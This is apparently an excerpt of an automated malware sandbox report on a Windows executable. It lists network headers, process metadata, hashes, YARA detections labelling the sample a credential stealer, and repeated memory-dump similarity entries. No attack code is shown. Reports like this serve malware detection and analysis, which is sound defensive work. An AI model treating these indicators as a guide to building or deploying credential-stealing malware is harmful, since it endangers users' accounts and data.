Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcgvPKKG%2F0pPmhFV6kI7U7tGVy39rtAZSK%2BNRLpn4PCcjNjSNUdBHeq%2F70hekIs1FkG3h%2B%2FOLn3M4Dvj6A%2B%2F8mVm3DmjXwAs0aHXrWLuPuO28AvA%2FT2272G3oC%2Bug5J5Svs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80da2dec494326-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2079&min_rtt=2071&rtt_var=794&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2092&delivery_rate=1363211&cwnd=178&unsent_bytes=0&cid=b8c6ffd204aa62d2&ts=36472&x=0"
2024-12-26 11:50:52 UTC | 20 | IN | Data Ascii (chunked body, raw hex omitted, CRLFs restored):
f
ok 8.46.123.189
2024-12-26 11:50:52 UTC | 5 | IN | Data Ascii (terminating chunk):
0



Target ID: 0
Start time: 06:49:08
Start date: 26/12/2024
Path: C:\Users\user\Desktop\P0SJULJxI0.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\P0SJULJxI0.exe"
Imagebase: 0xb50000
File size: 2'954'240 bytes
MD5 hash: E5D4E86F709D076FA5BD3E10007F487F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2100238097.0000000001484000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Non-executed Functions

Memory Dump Source
• Source File: 00000000.00000003.2506445308.0000000001462000.00000004.00000020.00020000.00000000.sdmp, Offset: 01462000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1462000_P0SJULJxI0.jbxd
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2482187613.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, Offset: 05CBE000, based on PE: false
                                                                                                            • Associated: 00000000.00000003.2479006175.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_5cbe000_P0SJULJxI0.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e1cb06311242e40e9e63836fc574605084e3e880a466c1b7b6274ea5e352504
                                                                                                            • Instruction ID: 1c573185f8406dc7cb8bb40be293782bd2d3281abcf7b86a6c57dd5fb3c18408
                                                                                                            • Opcode Fuzzy Hash: 4e1cb06311242e40e9e63836fc574605084e3e880a466c1b7b6274ea5e352504
                                                                                                            • Instruction Fuzzy Hash: FB51F03200A384DFC717CF75C996A8ABFB5EF47310B1985CED4818E163C2746646DB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2482187613.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, Offset: 05CBD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_5cbe000_P0SJULJxI0.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e1cb06311242e40e9e63836fc574605084e3e880a466c1b7b6274ea5e352504
                                                                                                            • Instruction ID: 1c573185f8406dc7cb8bb40be293782bd2d3281abcf7b86a6c57dd5fb3c18408
                                                                                                            • Opcode Fuzzy Hash: 4e1cb06311242e40e9e63836fc574605084e3e880a466c1b7b6274ea5e352504
                                                                                                            • Instruction Fuzzy Hash: FB51F03200A384DFC717CF75C996A8ABFB5EF47310B1985CED4818E163C2746646DB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2482187613.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, Offset: 05CBE000, based on PE: false
                                                                                                            • Associated: 00000000.00000003.2479006175.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_5cbe000_P0SJULJxI0.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9ce16ca6463c305931373806edfe380a26f31c779b6560ba923870c387bb8978
                                                                                                            • Instruction ID: 73eed74ef0b69b99d944c7e9db2dc75ea9a5187f8f19c3fc7fbefc2161b283d8
                                                                                                            • Opcode Fuzzy Hash: 9ce16ca6463c305931373806edfe380a26f31c779b6560ba923870c387bb8978
                                                                                                            • Instruction Fuzzy Hash: 8C41143600A295DFC716CF75DA86A8BBFB6FF47310B1886CDD4825E123C2706646EB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2482187613.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, Offset: 05CBD000, based on PE: false
                                                                                                            • Associated: 00000000.00000003.2479006175.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_5cbe000_P0SJULJxI0.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9ce16ca6463c305931373806edfe380a26f31c779b6560ba923870c387bb8978
                                                                                                            • Instruction ID: 73eed74ef0b69b99d944c7e9db2dc75ea9a5187f8f19c3fc7fbefc2161b283d8
                                                                                                            • Opcode Fuzzy Hash: 9ce16ca6463c305931373806edfe380a26f31c779b6560ba923870c387bb8978
                                                                                                            • Instruction Fuzzy Hash: 8C41143600A295DFC716CF75DA86A8BBFB6FF47310B1886CDD4825E123C2706646EB91